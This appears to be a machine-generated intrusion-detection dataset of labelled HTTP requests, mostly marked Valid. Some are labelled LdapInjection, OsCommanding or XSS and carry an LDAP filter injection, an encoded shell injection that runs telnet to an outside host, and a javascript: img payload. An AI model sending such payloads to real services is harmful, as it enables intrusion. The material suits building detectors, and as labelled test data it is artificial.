POST /ewCtDy7hrpnb2geonku/eaa3o/UIb8mgE4/rNgfassorechnW/b1fTwfveuho/Jezhtpass/oPbN_jU/5ssoiWxmlUo.gif? HTTP/1.1
Content-Length: 217
Content-Language: ieateg,u7asAm,sonnldne
Content-Encoding: compress
Content-Location: /pxgRd/snrq/odekaeot.gif
Content-MD5: Zmlvb2xpdGdNTElzbW55cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Jan 09 13:22:26 CET
Last-Modified: Mon, 26 Jul 04 12:05:21 CET
Host: www.mthtsansO.uk:80
Connection: eObn
Accept: text/*, image/png, text/*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.5, deflate;q=0.9, gzip;q=0.2, identity
Accept-Language: sh-hnAnnzl;q=0.9, niftsd-gen, Bebeyu-n;q=0.4, e-ec3dnnt;q=0.4
Cache-Control: max-stale=55
Client-ip: 50.137.205.249
Cookie: hemkf68nin=Ireualawmtz
Cookie2: $Version="7"
Date: Thu, 13 Apr 06 13:11:35 CET
ETag: W/"pN2pmfFnSNMmxzKoUH"
Expect: 100-continue
From: 5awfaf@mr4qc.org
If-Modified-Since: Wed, 09 May 07 24:54:47 CET
If-Unmodified-Since: Tue, 27 Mar 07 10:16:48 UTC
If-Match: *
If-None-Match: "wzg-HFWihVl2rc3p"
If-Range: *
Max-Forwards: 1175
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic N1l0QTY6bnV5bmhnbw==
Authorization: Digest realm
Range: 2086-1,90-
Referer: http://SirE.net/emree/E3eost.pdf
TE: chunked,gzip,trailers
Trailer: Connection
User-Agent: Mozilla/3.4 (Windows; U; Win98 4.5; li-ru; rv:0.5.0) Gecko/88811937
UA-CPU: StrongARM
UA-Disp: 1558,006,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 968x4170
Via: FTP/6.0 116.253.24.42, HTTP/6.8 www.toyejadl.shtml, 8.9 www.baih0ai.tiff
Transfer-Encoding: deflate
Upgrade: d8jw0/9.1
Warning: 539 174.52.125.218:7 "gaeepmhroih" 
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

Ee=908&s2echsa=hhi niE7ta&iaNzuhUr=isge~i &9hnetcatlike6=d ead2&deeuisuisnttm0=3lBa-NxjX&hhta=l9AS8C&u4e=480499&0k_E=312&ssGetoyqm=ye~&aono=nw@K7g1nMk&CT8RZYAB_D1g=imgbodys &dsehhSi6a=4&nqseast0otA0d=nhzptefwCyo

End - Id: 32846
Start - Id: 9317
class: Valid
GET /nWo1vB8Dg_6V9w/nLRmuLUVaK@o/RevalXmnzZ8/h8faalaft6s/netwedhya5gtessjo/e.V.htm? HTTP/1.0
Host: www.tm41Aao.org
Connection: s0nut
Accept: audio/basic, image/*;q=0.7
Accept-Charset: windows-1250, windows-1258
Accept-Encoding: *;q=0.6
Accept-Language: 8aete-neVeaiec;q=0.4, n2-nainwl;q=0.2
Cache-Control: min-fresh=138
Client-ip: 46.180.25.90
Cookie: l8ibfhta=45340137;mEsmgnas=7CeMj_o;oGnpaccfv9dfeeh=deensnce3tt1soe5o;myuTbi=tt
Cookie2: $Version="594"
Date: Thu, 05 Oct 06 06:12:33 GMT
ETag: W/"F7l0QFAzlJz94K3uT74c"
Expect: l4dnint
From: aorhle@n0oang.st
If-Modified-Since: Thu, 16 Dec 04 24:36:04 GMT
If-Unmodified-Since: Sun, 10 Jul 05 20:02:54 UTC
If-Match: *
If-None-Match: *
If-Range: "5.JKRUv4TnSpH6-"
Max-Forwards: 1
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: i1zP b8oft=oatbt
Range: 7-,599-,-17
Referer: /nvan/aarifnia/upe2ts/sshT.pl
TE: trailers,gzip;q=0.9,chunked
Trailer: Upgrade
User-Agent: Mozilla/1.2 (compatible; Konqueror/7.4; Open BSD i386; eea7gwv; utNR; taef)
UA-CPU: MIPS
UA-Disp: 234,388,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x0669
Via: Fe1g/3.9 156.140.212.237, HTTP/6.7 186.179.248.214
Transfer-Encoding: deflate
Upgrade: enhHu/9.9, 1see8/1.3
Warning: 040 www.ojuu.gif "ngtctI" "Thu, 08 Mar 07 22:46:35 CET"
X-Forwarded-For: 156.126.164.181
X-Serial-Number: 8554851
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9317
Start - Id: 21227
class: Valid
GET /hDyWg8-@S/E_@P9RGdJ5DSC.pl?tyamgiHzdE=iCL0.v9P3gI&f%uIRvpjzEstdinJphp=1168763431&jetea=eairaek&meh1esataitrss=%27dg%40u3ow&fenr0e=4264&snoe1ae=ApeotslouahEkz&cw73M9=18742&QLP4Lkan_P=sfe&srt9efuui0dcgk=set&dinOn8sE=47 HTTP/1.0
Host: 119.149.116.71
Connection: close
Accept: video/*, audio/basic
Accept-Charset: macintosh;q=0.5, iso-8859-5;q=0.2
Accept-Encoding: compress;q=0.6, compress;q=0.3, gzip, deflate
Accept-Language: ee-recl8efo;q=0.1
Cache-Control: no-transform
Client-ip: 167.165.216.33
Cookie: hr1eMG=7853
Cookie2: $Version="762"
Date: Sun, 18 Mar 07 13:32:20 CET
ETag: "5NP3vINPBA0Gcz_Gmq"
Expect: 100-continue
From: eior@ZN2f.fr
If-Modified-Since: Tue, 28 Nov 06 20:25:42 GMT
If-Unmodified-Since: Tue, 29 Jul 08 11:30:29 GMT
If-Match: *
If-None-Match: *
If-Range: "dr@pLbHUGLx8QJF"
Max-Forwards: 69
MIME-Version: 0.0
Pragma: sZhrI='6'
Proxy-Authorization: NTLM bG50cnNtemhjbWlPdGRlM2tWY3BlcmNDNmlpb2JneWlyd2FleFRTb2ZpaWhoag==
Authorization: Basic N2Fvamtoc2k6dHRhb3M3
Range: 514-56,34-,2775-22974
Referer: http://www.aoopn.uk/wrmief.wmn
TE: gzip,deflate
Trailer: Referer
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 5.2; ee-of; rv:1.0.2) Gecko/71546682
UA-CPU: Sparc
UA-Disp: 664,7142,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7822x0790
Via: 3.5 www.rctt.tiff
Transfer-Encoding: identity
Upgrade: Srxeeh/0.2, naeit/0.5, gRir/4.0, hbtOe/2.7
Warning: 474 205.133.110.111 "znelncj" "Mon, 25 Jan 10 21:18:40 UTC"
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 323295
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21227
Start - Id: 27070
class: Valid
GET /eg5JhFVb/badndmbafsUrcmrsmsn/8BV@rm/lVP/DBftpacceptde/_GdgW331/t4sroLzx/IWHzlnN1NWxallZw./ca/O@0agNTNq8WdFbetweens/ni-e_CQkt-qJInNWZ.gif?et=rbNeaptaohym&ew6oruhEseOj=oYiX-1%40EP&icrelocmhro=173665853&tm4Lauha=gqs8fuy&0Kh-S1uS=m3Penadlnaobiaibh&nFufaenl=tBv&0rcpiiframePFhavingNBform=lilnn&IXUkh2VFsystem3E=1adminxh%5C HTTP/1.1
Host: www.tSzwhv5nxs.biz
Connection: 1mayowon
Accept: audio/*, audio/*
Accept-Charset: x-mac-japanese
Accept-Encoding: *
Accept-Language: a-ins4f, Seiq-nFipdtae, iyfoed-dIuiiner
Cache-Control: no-store
Client-ip: 192.25.176.211
Cookie: stloNoluyarch6=foHwi;rinknor4=214;drduSsnose=2937452
Cookie2: $Version="764"
Date: Sun, 24 Dec 06 10:15:25 UTC
ETag: "V8DY8gKc@gCxffLq"
Expect: Pdooxti=q8vaaeat;es4etyb=clerresw
From: snith@9ppnlibnt.net
If-Modified-Since: Sat, 14 Oct 06 01:04:58 GMT
If-Unmodified-Since: Sat, 09 Jun 07 10:10:26 CET
If-Match: *
If-None-Match: *
If-Range: "V4aI3jom3tcuAsd2p"
Max-Forwards: 2381
MIME-Version: 2.0
Pragma: 0xra=etdc
Proxy-Authorization: Basic aGVlZW9pOnJmT2h1
Authorization: NTLM bWk5ODZpZGVub2Q5dHF0bjlpYXNvbXlrcmV0ZW82d01hdDhvMHM=
Range: 911-8
Referer: http://hmnet.com/ngOtcen/pofseho/dee23/bteutlg.fgf
TE: trailers
Trailer: If-Range
User-Agent: aeirsa1mt/1.5.2.2
UA-CPU: Sparc
UA-Disp: 2539,8756,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 929x150
Via: utw/6.8 www.ea6mt.shtml:4586
Transfer-Encoding: assi; tliS=9vceo
Upgrade: yttNQh/3.9, yfpi4i/1.8, lhrs/6.3, setd/4.5, Eye/5.3
Warning: 122 www.yssacdsa.gif "Acidea" "Thu, 21 Jan 10 17:16:57 CET"
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 0883782422223319
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27070
Start - Id: 14514
class: Valid
GET /c7LL/NbQorqnWVpU-yX/e65awyaooinf/hl3CaNQFGSIWikK4/uditedEor/qKRsam@Fs8m4B/hhGdMfp_vDdfw/ffa3szpevc/oee8.jsp?hjeeofeoOyoNns=d+&serra=%28a%3Cgttchcfti&sba4=eaydiv%24%26&noy4nwes=ogYRp5jd&bVtb-2formaLYU=yn%40&ei4=lmsentmpsna2&aQyaeqeula=waSeTJF8q7&bco094pre=56106718 HTTP/1.0
Host: www.6bt9ttd.gov
Connection: close
Accept: image/gif, text/xml;q=0.4
Accept-Charset: iso-8859-4;q=0.5, x-mac-japanese;q=0.9, euc-tw;q=0.5
Accept-Encoding: gzip;q=0.8
Accept-Language: o-sj
Cache-Control: max-stale
Client-ip: 92.117.239.197
Cookie: 7afpnnasbmannw=7;rieTttesi=aX@T.Rly;osnnetnev8nddie=o:U
Cookie2: $Version="47"
Date: Thu, 27 Apr 06 10:37:06 CET
ETag: W/"CFoeG5EFKG7G-UoU"
Expect: 100-continue
From: tegitG@nwslt9.biz
If-Modified-Since: Wed, 10 Mar 10 12:50:44 UTC
If-Unmodified-Since: Thu, 15 Jun 06 08:19:29 CET
If-Match: "Q34EvEytLoy8phWRSQT"
If-None-Match: "G_j74Q.2qs7Cyq1307"
If-Range: Thu, 03 Mar 05 17:44:16 UTC
Max-Forwards: 0782
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM cnBybUlpZmJpaW1lMnNua3Rhb2hpMHBhclRtdEV0c25zbVQ3
Authorization: NTLM ZWZpYWllaHVmZWN0cWVibHFza2FEZWhydGVqZWFlNWplY2wyRXRiVHRoTGU=
Range: 4019-22,-23,269-5
Referer: http://zmtbt1.com/t4r5et.pdf
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: eekee6aofihE
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3486x145
Via: 3.1 www.lknds.css
Transfer-Encoding: deflate
Upgrade: ybp/8.9, iTtr2/2.5, fay5/2.8, soboni/1.5
Warning: 286 www.onba2h.tiff "okewrt0tac" "Sun, 08 May 05 11:09:41 GMT"
X-Forwarded-For: 129.8.69.87
X-Serial-Number: 01337
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14514
Start - Id: 5359
class: Valid
POST /apQ_RSO6blVL3y/eNjawnd3z3zMlahK.png? HTTP/1.0
Content-Length: 236
Content-Language: i,a,i
Content-Encoding: identity
Content-Location: http://sego.fr/Urh5/ehwdstN/NosEt9sl.swf
Content-MD5: M2Jhb1RMdENoY3N0eWlocw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Jan 05 16:29:50 CET
Last-Modified: Thu, 28 Jun 07 08:05:39 CET
Host: www.a20eshe.be:170
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic;q=0.7, x-mac-cyrillic;q=0.5, us-ascii;q=0.4
Accept-Encoding: compress;q=0.6, compress, deflate
Accept-Language: w-mwoS;q=0.4, ttp-vne, febtteei-kroOFit;q=0.2, tsnuee6-nt;q=0.8
Cache-Control: no-store
Client-ip: 19.47.117.71
Cookie: erakefqsahohTe=php@;1ssil=02042638;eitMhaffl=12752;eelsopvfrn=7
Cookie2: $Version="1"
Date: Fri, 08 Apr 05 09:31:16 UTC
ETag: W/"iREKlovTvO.RPG.OWn"
Expect: 100-continue
From: 91ean@e9cutenhT7.cz
If-Modified-Since: Mon, 25 May 09 05:09:57 GMT
If-Unmodified-Since: Sun, 06 Jun 04 16:15:28 UTC
If-Match: "lEwa0qjAM8JJSegEICN"
If-None-Match: *
If-Range: Thu, 20 Nov 08 20:54:59 GMT
Max-Forwards: 9466
MIME-Version: 9.7
Pragma: os='ulnie'
Proxy-Authorization: masa iaeT0e=sarb3wmi
Authorization: NTLM Y2VrdWV5YW9lYW5ueGFlNmlwb2hxcnJnbmRiOWNhbmNlaXBSZW5hcmd0c2VpY3I=
Range: 90-23,76962-
Referer: /0t5gsEFS/6earrlre.gz
TE: gzip
Trailer: Connection
User-Agent: Mozilla/8.7 (X11; U; Unix 3.8; am-ea; rv:8.5.7) Gecko/07421520
UA-CPU: x86
UA-Disp: 904,156,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6579x971
Via: 4oloZ1/4.8 www.wrilttpp.css
Transfer-Encoding: identity
Upgrade: t8r/6.4, osm/8.4
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 028740747069773
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

abctiiaS0aa=sler2ri&ree7zsSw=016887&tleAoTwarhryn=tgroup by&8Z_c=ed&YlxLkYvc=mia&xfpw-JNx8document=673158&rN0nbajn=31tenSsf&aena=3d&aX4x=83744&teOtoT=c(2pimdS9perlertdu$&tshbabicthtei=acceptgrea pspsae&cee=b8tUrxeitno%sbody?thae

End - Id: 5359
Start - Id: 39035
class: LdapInjection
PUT /e-GbBxWLMw/5xcmla/rrtnkysdr/iAqpGUNTm/oT7.jpg? HTTP/1.0
Content-Length: 255
Content-Language: npptt1
Content-Encoding: deflate
Content-Location: /7s3hnr5e/pnGieoE/lodistri/SpaR.jpeg
Content-MD5: YXd4YWVlZWJlYXR0b2tJeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jun 07 24:01:58 GMT
Last-Modified: Mon, 11 Apr 05 03:09:16 CET
Host: www.lXaQkdheo.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 25)(&(objectClass=lun)(|(sn   = r2h)(cn=wen J*))
Cache-Control: no-transform
Client-ip: 102.128.132.6
Cookie: WDcopyfD-=xM9W_LgrH
Cookie2: $Version="172"
Date: Sun, 22 May 05 22:01:03 GMT
ETag: "m.zvaF9l0uX5MvZcQ"
Expect: 100-continue
From: 6eGtzO@aUa6ae0S.fr
If-Modified-Since: Wed, 15 Jul 09 06:17:50 CET
If-Unmodified-Since: Sat, 23 May 09 10:59:02 UTC
If-Match: "Tdc-JT0@09Z17dVmk"
If-None-Match: "-G7ddr_CSaCjw0_UEX"
If-Range: Tue, 18 Apr 06 12:43:13 GMT
Max-Forwards: 4
MIME-Version: 9.1
Pragma: oy9af='rpnA'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic YWVvZTpzc1RvM0l0
Range: -0298
Referer: http://www.Daooyo.org/tdb3in/ousnta/t8iss.jpg
TE: trailers,gzip;q=0.4
Trailer: Trailer
User-Agent: aonlnnH (9S9y5W; rIir7DQ; bYXfHqEq; ef6-F7m)
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 699x217
Via: 5Uee/7.0 www.eTrnot.gif, HTTP/7.8 www.ufldWm2.tiff
Transfer-Encoding: deflate
Upgrade: ne66ft/5.8, ziI/5.3, ofii/1.2
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

teutQnlb=nPz&oPeya=708702&taro6oy=asi&py=asrO&t7piaSm1sS=iiRKa&tTerr= 1sfrvehtaccesa2h2e&ima=a5ameslmfajhth&e2iOird=r1ohee&s7snweo4ElcyjQ=737942&zooiaIa=dpnnnhehtnon&jafetsowisum=384383&e8=242830&atlit=teLinxbetweenr~c&gdIYsamtd=7&qajYh6Ha6betweene9=e l

End - Id: 39035
Start - Id: 6111
class: Valid
PUT /ek6RHEjfscjG/ylsXU_o7/ugsbtPa/zthtpasshstpD1U/lscwisyhbqtenan.php4? HTTP/1.0
Content-Length: 188
Content-Language: tapphe,gctnt
Content-Encoding: identity
Content-Location: http://mcftih.com/lfeeeoai/ybp4To/aptc1.msf
Content-MD5: MXRydno3cm5uQXRoZWVzZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Oct 04 07:19:03 GMT
Last-Modified: Mon, 05 Jun 06 20:43:57 UTC
Host: www.E2edo4t.uk
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.8, koi8;q=0.3
Accept-Encoding: compress;q=0.0, identity;q=0.8, gzip;q=0.0
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 53.107.10.147
Cookie: I.likeG3SeXr=0;eoaeAi=tdflvzk.Mx;Tnaew4lsts=7 Adlrifoh
Cookie2: $Version="97"
Date: Tue, 09 Sep 08 16:47:15 UTC
ETag: W/"lv6u5s20GnsOuQe9be4Q"
Expect: mEhD=y8nam
From: nwqTu@iinmi.st
If-Modified-Since: Wed, 06 Oct 04 19:54:54 UTC
If-Unmodified-Since: Mon, 11 May 09 08:21:47 CET
If-Match: *
If-None-Match: "p9GwTCq-H8YEvhGky"
If-Range: Sun, 08 Jan 06 03:42:39 GMT
Max-Forwards: 1757
MIME-Version: 7.4
Pragma: ezefn=ersmoth
Proxy-Authorization: NTLM b3hpaDV0NGV1ZWhyc3JvcGVyZW9HcmFTdG5uYUFUaXI=
Authorization: unjs obua=swm5onk7
Range: 679-,5829-
Referer: http://ebey.fr/sAad.msf
TE: chunked;q=0.4,gzip;q=0.4
Trailer: Host
User-Agent: mmpLz2OiT http://www.seee2yl0.st
UA-CPU: PowerPC
UA-Disp: 395,743,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4456x1785
Via: 4.5 www.ser7sm.js, FTP/1.5 www.inedyiAc.css, 5.4 131.51.186.174:017
Transfer-Encoding: deflate
Upgrade: mndT8/4.5
Warning: 650 69.47.85.230 "eneld6Odeonlenmnn" "Tue, 12 Aug 08 13:16:53 CET"
X-Forwarded-For: 224.40.113.11
X-Serial-Number: 89346832324261469384
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9yearScttdedoo=kqI5eachttpsq&eeea=zLe&iscrEsvr=dee7&Eityfmbo0=aopenlaso&rYongzi=513654&rYlwRe7=it&muegtgse=d7uiWEaliainputltee&16seri=4685669614&.wiZ=rtit2toASr9ziy&oe9rlyfo= ee&bhecey=972

End - Id: 6111
Start - Id: 34903
class: Valid
PUT /ikuB/ateoshhbn6eeuoqawsca/s5J9@2LtBcqhcPLAytE.exe? HTTP/1.1
Content-Length: 53
Content-Language: hnla2hha,hS
Content-Encoding: deflate
Content-Location: http://mdfc.st/wacoy2c/6oeenhmE.cgi
Content-MD5: YW5lb2llbnJhM0V0aTVzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Oct 07 02:42:46 GMT
Last-Modified: Sun, 11 Nov 07 04:12:44 UTC
Host: www.pjvmiano.fr
Connection: uee0g
Accept: image/*;q=0.5, audio/*;q=0.8, application/postscript;q=0.6
Accept-Charset: windows-1258, euc-kr, x-mac-roman
Accept-Encoding: gzip, gzip, identity, identity, compress
Accept-Language: shioi-seoseos, niTau-trph, 7t-eytHzgrf, cngr-oSnw8r;q=0.0, Rkp-0i
Cache-Control: no-transform
Client-ip: 180.36.30.16
Cookie: oAm=03;czhkOda=h%40afGOrg;H2Mum%uR-u6shutdown=10181997
Cookie2: $Version="3"
Date: Thu, 12 Jul 07 03:05:32 GMT
ETag: W/"rQal0x1PA1W6PX-"
Expect: 100-continue
From: auaes4Eh@tlwea3.gov
If-Modified-Since: Fri, 01 Dec 06 22:42:12 GMT
If-Unmodified-Since: Sat, 20 Nov 04 13:03:41 UTC
If-Match: "owUgHdluQxeSlDsZae"
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Basic cG9lZjRoOmk0M29vbg==
Range: 068382-
Referer: http://e6MvTa6w.org/1ggRh/gIEv/dbrdnopl/lwoodo/athi.sh
TE: trailers
Trailer: If-Modified-Since
User-Agent: kadurg
UA-CPU: x86
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4336x049
Via: FTP/2.6 www.Ibta9h.gif:937, HTTP/2.9 www.erhhesp.html:494
Transfer-Encoding: deflate
Upgrade: deie/5.6, lOhrot/4.1, e2fa/2.7, pai8/9.3, ezl2x/0.4
Warning: 624 www.Mseie.css:70014 "iiejrso6etnssr0EeteL" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 5563045665
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sooRpf=145&nz=l homeay&ntoketraes=017&yiaxltcH=3wlhyt

End - Id: 34903
Start - Id: 43183
class: OsCommanding
GET /n3ganeiiasghler/jLexecdivHrCYgjMV1Kexec/rtee/qha9qEs4u/2l/pigRbRpK7GN2bz80xv6W/erestct8cenfp/ikdcu5aold0porlay8h/i4uobtu45i2dLoh4/t@L1_f/Qjbfinput9r.jpeg?_a07BvdiPC-=sdt&ctfeq=33053577&wo0o1joeCsdudar=tporiSrr+nw&x3nen=00&oun=+p&nhehdsei0sp=%5C%22+%5C%3B%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.iestteme.com+8265+++%3B&n4Tdeirths=asismenttoorimn&blfiu=tSy2fapu3&GbetweennetcatocmdSallS-nZ=iYoz9u&pneeKceeEn=fep&ijili=connectw91nq+dE&likeypqm2tU8M=varneqvtoetc&fdRua=tbe HTTP/1.1
Host: www.naus.fr
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr;q=0.3, gb2312, utf-7, us-ascii
Accept-Encoding: gzip;q=0.6, gzip, gzip, gzip, compress;q=0.5
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 177.135.197.204
Cookie: satvefyiiu9o=725510;oWJX=?l5bgalle7sru)aHl8tt8;_g7WX=508;zahjwtaditEal=dgmEEab5;d8q=2760;exeAg=udocumentk2o4iluhpassthru
Cookie2: $Version="8"
Date: Fri, 04 Dec 09 24:36:51 UTC
ETag: "3n7cYjzbN.STqhi"
Expect: dyewmaae=oUdqj
From: 9aythl@Osdt.st
If-Modified-Since: Sun, 26 Apr 09 18:12:49 GMT
If-Unmodified-Since: Tue, 26 Jun 07 07:49:22 CET
If-Match: *
If-None-Match: "t5Noiu8MlNn9wkv3"
If-Range: Sun, 24 Sep 06 12:14:53 UTC
Max-Forwards: 0285
MIME-Version: 6.0
Pragma: esr='1taw'
Proxy-Authorization: 3ndn s8tn=stem
Authorization: Digest cnonce="hTsS"
Range: 332370-1588,656-95
Referer: http://www.aedtcO.st/suen/2E9dfubp/wemlnO.tar
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 3.7; aC-qe; rv:9.0.3) Gecko/33442258
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x846
Via: FTP/1.4 www.roriN4.css, 5.1 248.22.29.195, dxnten/1.9 32.1.7.129
Transfer-Encoding: compress
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 306 www.gnulF0h.html "etlXa" "Wed, 08 Aug 07 07:40:17 GMT"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43183
Start - Id: 46541
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: 244.33.234.83
Connection: keep-alive
Accept: application/*;q=0.0, text/xml
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: eb-eiprhd;q=0.4, 3Keietoa-hee;q=0.6, eyb0alal-t
Cache-Control: min-fresh=967
Client-ip: 177.5.6.202
Cookie: srnblaIaksxt=1823
Cookie2: $Version="0"
Date: Thu, 12 Jun 08 01:37:06 UTC
ETag: "2tchV3o_V1MPEQcePm"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Sat, 17 Jun 06 03:18:15 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "48FzKeCqWQkpmIJoqv4i"
If-None-Match: "8L9FnjWtU@u@r@3g7l.c"
If-Range: Wed, 30 Dec 09 11:28:25 CET
Max-Forwards: 3384
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic OGVwZ29kdWU6c25lcw==
Authorization: tye8 wrtary=sdoio
Range: 5417-,7803-59243
Referer: http://eteyt.net/eihqlM/rteuntca/n59tcitd/m0so0/swisynag.mpg
TE: trailers
Trailer: Pragma
User-Agent: apho7ajol (xK1.1ulv; l3lIcWqQP)
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 139x000
Via: 1.8 www.iqoan0t.jpeg:650, 1.6 219.152.179.179:00311
Transfer-Encoding: gzip
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46541
Start - Id: 16830
class: Valid
GET /ttP/eC/BLeO@Nwindow.opent0@QX/akb5A2M8YgQ2Ow/gxp_crsamjprocessing-instructionnm5W/DWWBetHY/mnIfjZyOh-nD5GcR/.Mo/8eahsxot3drboui3sph/eZgfD0Fn3xv@Y@Q/8pLWxR1DuHPIqY@.aspx?ra=sdMP&sao5i8cmrncId=4232727882&danptpaNtaycr=nB5&eiuutEeyp1sL6=s0LJ&sec9vo=tin%5C6%26U%3Dhl1eas%25t%3Bo&dxh=ftpnshtsn+&ta=263987&ALGzOt6r=1927107155&djR=068&LUa9FS=75OcCrB&JttkL0EH4Ap=h%5Cn%28hexecd%3A%2Fqhngeexe%2B&Vgdeletexterm0replace.@=imte%5C&toyDsehwP=%3Af%3Bfw%3EttM&lybE0wylioreace=+e6wa&4nhosuwxegUr=gaehGh0ts%5Dnny+whereshutdowndt HTTP/1.1
Host: 205.0.210.116
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad, x-mac-chinesetrad;q=0.1, shift_jis;q=0.5, euc-cn;q=0.2
Accept-Encoding: deflate;q=0.5, gzip, compress;q=0.3
Accept-Language: *
Cache-Control: max-age=35443
Client-ip: 241.14.31.61
Cookie: zaf=t1;Tiugtiso8evtsf=54202558;iwvIvLI8vPx8=nsohaimt7]gfoErrs;eaesdrAotiro0aj=$e+cbetween;pGVIcifYEJ9t=];wnOc=mSNe
Cookie2: $Version="7"
Date: Fri, 24 Aug 07 05:03:03 GMT
ETag: "itjXOwKf@iA@iiML87g"
Expect: ttlun=eoothpgi
From: sLreap3i@a64Yedt.be
If-Modified-Since: Sat, 23 Jul 05 17:42:43 GMT
If-Unmodified-Since: Fri, 30 May 08 05:02:35 GMT
If-Match: *
If-None-Match: "Rv9RXRDpttAjaUwk"
If-Range: *
Max-Forwards: 130
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest username="lfoxlnn"
Authorization: mt9tz Oroae6o=Natt
Range: 9-87181
Referer: http://lknsf.fr/leoppz.mdb
TE: deflate;q=0.5,trailers,gzip;q=0.9
Trailer: If-Range
User-Agent: Mozilla/4.2 (X11; U; SunOS sun4u 2.4; sn-si; rv:0.2.1) Gecko/34015365
UA-CPU: StrongARM
UA-Disp: 952,004,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 818x5345
Via: HTTP/0.2 www.tmesb.js
Transfer-Encoding: identity
Upgrade: lenv/1.1, ndi/4.7
Warning: 045 www.on6iee.shtml "rinmaEtgssGotet" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 60090044663
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16830
Start - Id: 21317
class: Valid
GET /pl3/o5Aathmi5EmIoncnb/pnehl0rwu/xB1w/eg1qIK/lhevoitol2dopsos/2RLwinnttelnetscript.html? HTTP/1.1
Host: www.iixmMpy.net
Connection: eeleela
Accept: image/*;q=0.6
Accept-Charset: x-mac-cyrillic, macintosh;q=0.8, koi8, windows-1251, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: o8odc-ir;q=0.5, orAh7d-tRiskox;q=0.7
Cache-Control: nmwy=msdc
Client-ip: 107.104.243.184
Cookie: ebwzeb1o=+e;s8dpe5e=12Hslr
Cookie2: $Version="961"
